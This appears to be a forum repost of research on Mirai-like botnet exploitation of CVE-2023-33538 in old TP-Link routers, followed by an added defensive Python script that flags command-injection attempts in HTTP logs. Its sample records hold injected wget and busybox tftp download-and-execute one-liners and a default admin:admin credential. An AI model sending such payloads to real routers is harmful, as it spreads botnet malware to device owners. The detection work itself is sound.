Gandalf_The_Grey
We identified active, automated scans and probes attempting to exploit CVE-2023-33538, a vulnerability in several end-of-life TP-Link Wi-Fi router models:
- TL-WR940N v2 and v4
- TL-WR740N v1 and v2
- TL-WR841N v8 and v10
The observed payloads are malicious binaries characteristic of Mirai-like botnet malware, which the exploits attempt to download and execute on vulnerable devices.
We observed this activity after the Cybersecurity and Infrastructure Security Agency’s (CISA) June 2025 addition of this CVE (Common Vulnerabilities and Exposures) to its Known Exploited Vulnerabilities (KEV) Catalog.
There has been some discussion of how impactful (or not) these active campaigns might have been. To address this, we conducted a deep-dive investigation by emulating the TP-Link TL-WR940N router. Using firmware emulation and reverse engineering, we analyzed whether the specific exploits observed in our telemetry could successfully use this vulnerability to deliver the payload on that device model.
During our investigation, we uncovered two important facts about the attempted exploitation of this vulnerability:
- Although the in-the-wild attacks we observed were flawed and would fail, our analysis confirms the underlying vulnerability is real
- Successful exploitation requires authentication to the router's web interface
This research demonstrates that while active botnet attacks leverage flawed exploit code, the underlying vulnerability remains a practical infection vector due to the widespread use of default internet of things (IoT) credentials.
TP-Link gave the following recommendation, regarding the devices and vulnerability in question:
We confirm that the affected TP‑Link devices are end‑of‑life, and no vendor patches are available. Our recommendation to customers is to replace these units with supported hardware and ensure that default credentials are not used.
A Deep Dive Into Attempted Exploitation of CVE-2023-33538
CVE-2023-33538 allows for command injection in TP-Link routers. We discuss exploitation attempts with payloads characteristic of Mirai botnet malware.
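As an added example that is not part of the post above or of the cited research: the post describes scans that push a download-and-execute shell one-liner into a router's web interface to fetch a Mirai-like binary, and notes that exploitation of this CVE needs an authenticated session. The script below triages HTTP request records for that pattern generically: it decodes request parameters (twice, to catch double encoding), flags values that chain a shell separator, a downloader and an execution step, extracts the payload hosts for blocking, and records whether the request carried an Authorization header, which tells an analyst whether the attempt could have authenticated at all. The record format, the `/cgi-bin/ping.cgi` path, the `host` parameter and all addresses are constructed for illustration and do not describe the real request shape of CVE-2023-33538.

```python
"""Triage HTTP request records for Mirai-style download-and-execute command injection.

Added example, not code from the post or the cited research. The record format,
paths, parameter names and addresses are all constructed for illustration.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote, unquote_plus, urlsplit

# Shell fragments typical of IoT download-and-execute one-liners.
SEPARATOR_RE = re.compile(r"[;|&`]|\$\(")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.IGNORECASE)
EXEC_RE = re.compile(r"chmod\s+(\+x|[0-7]{3,4})|\bsh\s+\S|\./\S+", re.IGNORECASE)
URL_RE = re.compile(r"(?:https?|tftp|ftp)://[^\s;|&'\"`]+", re.IGNORECASE)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def decode_params(query: str) -> Dict[str, str]:
    """Split a form-encoded string into parameters, decoding each value twice.

    The first pass handles normal percent/plus encoding; the second catches
    payloads that were double-encoded to slip past naive filters.
    """
    params: Dict[str, str] = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote(unquote_plus(value))
    return params


def triage(record: dict) -> Optional[dict]:
    """Return a finding for a record whose parameters carry a download-and-execute chain, else None."""
    params = decode_params(urlsplit(record["url"]).query)
    if record.get("body"):
        params.update(decode_params(record["body"]))
    header_names = {h.lower() for h in record.get("headers", {})}
    for name, value in params.items():
        if not (SEPARATOR_RE.search(value) and DOWNLOADER_RE.search(value) and EXEC_RE.search(value)):
            continue
        # Hosts the payload is fetched from (loopback is noise from the injected prefix).
        hosts = sorted({ip for ip in IPV4_RE.findall(value) if not ip.startswith("127.")})
        return {
            "src": record["src"],
            "param": name,
            "payload_urls": URL_RE.findall(value),
            "payload_hosts": hosts,
            # The post states exploitation needs an authenticated session;
            # an attempt without credentials could not have succeeded.
            "authenticated": "authorization" in header_names,
        }
    return None


def triage_all(records: List[dict]) -> List[dict]:
    """Run triage over every record and keep the hits, in input order."""
    return [hit for hit in (triage(r) for r in records) if hit is not None]


# Constructed sample records, not real telemetry. Addresses are from the
# documentation ranges; the path and parameter name are made up.
SAMPLE_RECORDS = [
    {"src": "198.51.100.7", "method": "GET",
     "url": "/cgi-bin/ping.cgi?host=127.0.0.1;wget%20http://203.0.113.10/mips%20-O%20/tmp/.m;chmod%20777%20/tmp/.m;sh%20/tmp/.m",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    {"src": "198.51.100.8", "method": "GET",
     "url": "/cgi-bin/ping.cgi?host=example.com",
     "headers": {"User-Agent": "Mozilla/5.0"}},
    {"src": "198.51.100.9", "method": "POST",
     "url": "/cgi-bin/ping.cgi",
     "body": "host=127.0.0.1%7C%2Fbin%2Fbusybox%20tftp%20-g%20-r%20bot.sh%20203.0.113.11%3Bsh%20bot.sh",
     "headers": {"Authorization": "Basic YWRtaW46YWRtaW4="}},
]

if __name__ == "__main__":
    for hit in triage_all(SAMPLE_RECORDS):
        print(hit)
```

The third constructed record carries an Authorization header for `admin:admin`, the kind of default credential the post's recommendation is about; in real telemetry the `authenticated` flag separates the noisy unauthenticated spray from the attempts that actually had a chance against a device still on factory credentials, and `payload_hosts` gives the download infrastructure to block.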